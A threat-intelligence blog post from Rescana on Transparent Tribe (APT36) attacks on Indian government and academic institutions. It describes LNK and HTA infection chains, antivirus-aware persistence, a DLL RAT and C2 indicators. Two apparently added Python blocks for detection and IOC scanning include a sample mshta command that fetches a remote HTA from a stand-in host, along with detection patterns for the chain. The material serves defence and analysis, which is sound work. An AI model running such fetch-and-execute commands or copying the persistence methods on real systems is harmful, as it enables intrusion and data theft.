Transparent Tribe (APT36) Deploys Advanced RAT Attacks Targeting Indian Government and Academic Institutions via LNK and HTA Malware
- Rescana
- 4 days ago

Executive Summary
Transparent Tribe (also known as APT36), a persistent and highly adaptive state-sponsored threat actor, has initiated a sophisticated campaign targeting Indian government and academic institutions with new Remote Access Trojan (RAT) attacks. This campaign is characterized by the use of advanced spear-phishing techniques, weaponized Windows shortcut (LNK) files, and custom malware payloads designed for stealth, persistence, and data exfiltration. The attackers employ multi-stage infection chains, environment-aware persistence mechanisms, and legitimate decoy documents to evade detection and maximize operational success. The campaign demonstrates a significant escalation in both technical sophistication and targeting precision, posing a critical threat to sensitive governmental and academic data.
Threat Actor Profile
Transparent Tribe (APT36) is a well-documented advanced persistent threat group, widely attributed to state-sponsored interests in South Asia, particularly Pakistan. The group has a long history of targeting Indian government, military, and educational sectors, as well as diplomatic and defense organizations. Transparent Tribe is known for its rapid adaptation to security controls, leveraging custom malware, open-source tools, and social engineering to achieve its objectives. The group’s operational toolkit includes a variety of RATs, credential stealers, and reconnaissance utilities, with a focus on long-term espionage and data theft. Their campaigns are marked by the use of highly convincing phishing lures, often mimicking official advisories or academic communications, and a deep understanding of the targeted environment’s security posture.
Technical Analysis of Malware/TTPs
The latest campaign by Transparent Tribe employs a multi-stage infection chain, beginning with spear-phishing emails that deliver ZIP archives containing LNK files masquerading as PDF documents. When a victim opens the LNK file, it executes a remote HTML Application (HTA) script via mshta.exe, a legitimate Windows binary often abused for living-off-the-land attacks. The HTA script is obfuscated and environment-aware, using ActiveX objects such as WScript.Shell to profile the host and determine the installed antivirus solution.
Based on the detected security software, the malware dynamically selects its persistence mechanism. For example, if Kaspersky is present, the malware creates a directory at C:\Users\Public\core\, writes an obfuscated HTA payload, and drops a LNK file in the Startup folder to ensure execution via mshta.exe on reboot. For Quick Heal, it creates a batch file and a LNK in Startup, launching the payload through the batch script. If Avast, AVG, or Avira are detected, the payload is copied directly to the Startup folder and executed. In environments with no recognized antivirus, the malware employs batch file execution, registry-based persistence, and direct payload deployment.
The second-stage payload is a custom DLL (commonly named iinneldc.dll), which functions as a full-featured RAT. This malware provides the attacker with remote system control, file management, data exfiltration, screenshot capture, clipboard manipulation, and process control capabilities. The RAT communicates with its command-and-control (C2) infrastructure using HTTP GET requests, with endpoint strings stored in reverse within the binary to evade signature-based detection. Notable C2 domains include dns.wmiprovider[.]com and aeroclubofindia.co[.]in, both of which have been observed in recent campaigns.
A particularly notable campaign variant, NCERT-Whatsapp-Advisory.pdf.lnk, delivers a .NET-based loader that drops additional executables and malicious DLLs for remote command execution and reconnaissance. This loader downloads an MSI installer (nikmights.msi) from an attacker-controlled domain and establishes persistence through registry modifications and file drops to C:\ProgramData\PcDirvs\.
Throughout the infection process, the malware displays legitimate decoy documents—often advisories from trusted organizations such as PKCERT—to the victim, reducing suspicion and increasing the likelihood of successful compromise.
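The chain above (LNK masquerading as a PDF, mshta.exe fetching a remote HTA, payloads staged in C:\Users\Public\core\ or C:\ProgramData\PcDirvs\, and a LNK or batch file planted in the Startup folder) maps naturally onto process-creation and file-creation telemetry. The following is an added example, not code from the Rescana report; the event field names, the sample user profile path and the stage-one URL are assumptions, and the events are constructed rather than captured.

```python
"""Added example (not from the Rescana report): rules for the LNK -> mshta.exe -> Startup chain, run over constructed Sysmon-style events."""
import re

# Staging directories named in the report, lower-cased for case-insensitive matching.
STAGING_DIRS = ("c:\\users\\public\\core\\", "c:\\programdata\\pcdirvs\\")
STARTUP_RE = re.compile(r"\\start menu\\programs\\startup\\")
URL_RE = re.compile(r"https?://")

def classify(ev: dict) -> list:
    """Return the name of every rule that fires for one event (field names are assumptions)."""
    hits = []
    if ev["type"] == "process":
        img, cmd = ev["image"].lower(), ev["cmdline"].lower()
        # Initial stage: the LNK runs mshta.exe against a remote HTA.
        if img.endswith("\\mshta.exe") and URL_RE.search(cmd):
            hits.append("mshta_remote_hta")
        # Persistence stage: mshta.exe, cmd.exe or msiexec.exe run against a staging path.
        if img.endswith(("\\mshta.exe", "\\cmd.exe", "\\msiexec.exe")) and any(d in cmd for d in STAGING_DIRS):
            hits.append("staging_dir_execution")
        # Quick Heal variant: a batch file launched from the Startup folder.
        if img.endswith("\\cmd.exe") and STARTUP_RE.search(cmd):
            hits.append("startup_batch_launch")
    elif ev["type"] == "file":
        target = ev["target"].lower()
        # Double-extension lure extracted from the phishing ZIP.
        if target.endswith(".pdf.lnk"):
            hits.append("pdf_lnk_lure")
        # LNK/HTA/batch/DLL written to the Startup folder or a staging directory.
        if (STARTUP_RE.search(target) or target.startswith(STAGING_DIRS)) \
                and target.endswith((".lnk", ".hta", ".bat", ".dll")):
            hits.append("persistence_artifact_write")
    return hits

def scan(events) -> dict:
    """Map event index -> detections, keeping only events that fired at least one rule."""
    return {i: h for i, ev in enumerate(events) if (h := classify(ev))}

# Constructed sample telemetry (not real captures) covering each stage of the chain.
STARTUP = r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
SAMPLE_EVENTS = [
    {"type": "file", "target": r"C:\Users\alice\Downloads\NCERT-Whatsapp-Advisory.pdf.lnk"},
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/stage1.hta"},
    {"type": "file", "target": r"C:\Users\Public\core\iinneldc.dll"},
    {"type": "file", "target": STARTUP + r"\upd.lnk"},
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c "' + STARTUP + '\\run.bat"'},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
]
```

Running scan(SAMPLE_EVENTS) flags the first five events and ignores the benign notepad launch; in production the same rules would be expressed in the EDR or SIEM query language rather than Python.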
Exploitation in the Wild
The campaign has been observed actively targeting Indian government agencies, academic institutions, and strategic organizations since late 2025. Attackers leverage spear-phishing emails crafted to appear as official communications, often referencing current events or advisories relevant to the target sector. The use of legitimate-looking decoy documents and adaptive persistence mechanisms has enabled Transparent Tribe to bypass traditional endpoint security solutions and maintain long-term access to compromised systems.
Infection telemetry indicates that the attackers are highly selective, focusing on entities with access to sensitive information or critical infrastructure. The campaign’s infrastructure, including C2 domains and payload delivery servers, has been registered and maintained with operational security in mind, often rotating domains and employing obfuscation techniques to hinder detection and takedown efforts.
Victimology and Targeting
The primary victims of this campaign are Indian government ministries, defense contractors, research institutions, and universities. The attackers demonstrate a nuanced understanding of the internal workflows and communication patterns within these organizations, tailoring phishing lures to maximize credibility and engagement. Secondary targeting includes individuals and organizations in Pakistan, often as part of decoy or misdirection efforts.
Victimology analysis reveals that the attackers prioritize entities involved in policy-making, defense research, and academic collaboration, seeking to exfiltrate sensitive documents, credentials, and intellectual property. The campaign’s focus on academia suggests an interest in both research data and the potential for lateral movement into more sensitive government networks.
Mitigation and Countermeasures
Organizations are strongly advised to implement a multi-layered defense strategy to mitigate the risk posed by Transparent Tribe and similar threat actors. Key recommendations include:
- Continuous monitoring for the indicators of compromise (IOCs) provided here, including suspicious file paths such as C:\Users\Public\core\, C:\ProgramData\PcDirvs\pdf.dll, and C:\Users\Public\core\iinneldc.dll, as well as the presence of malicious files like NCERT-Whatsapp-Advisory.pdf.lnk and nikmights.msi.
- Network security teams should block and investigate any connections to known C2 domains, including dns.wmiprovider[.]com and aeroclubofindia.co[.]in.
- Endpoint protection solutions must be configured to detect and quarantine LNK and HTA files, especially those masquerading as PDF documents.
- Regular audits of registry and Startup folder entries are essential to identify unauthorized persistence mechanisms.
- User awareness training should be conducted to educate staff on the risks of spear-phishing and document-based malware delivery, emphasizing the importance of verifying the authenticity of unexpected attachments or links.
Advanced threat detection solutions, such as behavioral analytics and memory forensics, can provide additional layers of defense against in-memory payload execution and obfuscated malware. Organizations should also consider implementing application whitelisting to restrict the execution of unauthorized scripts and binaries, particularly mshta.exe and cmd.exe.
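Two of the indicators above need a little care when hunting: the C2 domains are published defanged and must be refanged before matching, and the RAT stores its endpoint strings reversed, so a memory or disk scan for the domain as written will miss the binary. The following is an added example, not code from the Rescana report, covering the IOC monitoring recommendation and the reversed-string detail from the technical analysis; the file listing, the binary fragment and the DNS log lines are constructed samples.

```python
"""Added example (not from the Rescana report): matches the report's path, file-name and C2-domain
indicators in constructed artifacts, searching each domain forwards and reversed in binary data."""
import re

# Indicators exactly as published in the report (domains defanged with [.]).
IOC_PATHS = ["C:\\Users\\Public\\core\\iinneldc.dll", "C:\\ProgramData\\PcDirvs\\pdf.dll"]
IOC_FILES = ["NCERT-Whatsapp-Advisory.pdf.lnk", "nikmights.msi"]
IOC_DOMAINS = ["dns.wmiprovider[.]com", "aeroclubofindia.co[.]in"]

def refang(ioc: str) -> str:
    """Convert a defanged indicator back into the form that appears on the wire or on disk."""
    return ioc.replace("[.]", ".")

def scan_binary(data: bytes) -> list:
    """Return (domain, orientation) for every C2 domain found forwards or reversed in a buffer."""
    found = []
    for d in IOC_DOMAINS:
        plain = refang(d).encode()
        if plain in data:
            found.append((d, "plain"))
        if plain[::-1] in data:          # the RAT keeps endpoint strings reversed
            found.append((d, "reversed"))
    return found

def scan_paths(paths) -> list:
    """Return listing entries whose full path or file name matches a report indicator."""
    wanted = {p.lower() for p in IOC_PATHS}
    names = {n.lower() for n in IOC_FILES}
    return sorted(p for p in paths
                  if p.lower() in wanted or p.lower().rsplit("\\", 1)[-1] in names)

def scan_dns(log_lines) -> list:
    """Return the C2 domains queried in DNS log lines, normalised to lower case."""
    domains = {refang(d) for d in IOC_DOMAINS}
    hits = set()
    for line in log_lines:
        hits.update(t.lower() for t in re.findall(r"[\w.-]+", line) if t.lower() in domains)
    return sorted(hits)

# Constructed samples (not real captures): a binary fragment with a reversed domain, a listing, DNS logs.
SAMPLE_BLOB = b"\x00\x00GET /\x00" + b"moc.redivorpimw.snd" + b"\x00User-Agent\x00"
SAMPLE_LISTING = [
    r"C:\Users\Public\core\iinneldc.dll",
    r"C:\Users\alice\Downloads\NCERT-Whatsapp-Advisory.pdf.lnk",
]
SAMPLE_DNS = [
    "2025-11-02T10:14:03Z client=10.0.0.7 query=AEROCLUBOFINDIA.CO.IN type=A",
    "2025-11-02T10:14:09Z client=10.0.0.7 query=example.invalid type=A",
]
```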
About Rescana
Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their extended supply chain. Our advanced threat intelligence and risk analytics empower security teams to proactively identify and address emerging threats, ensuring robust protection for critical assets and data. For more information or to discuss how Rescana can support your organization’s cybersecurity posture, please contact us at ops@rescana.com.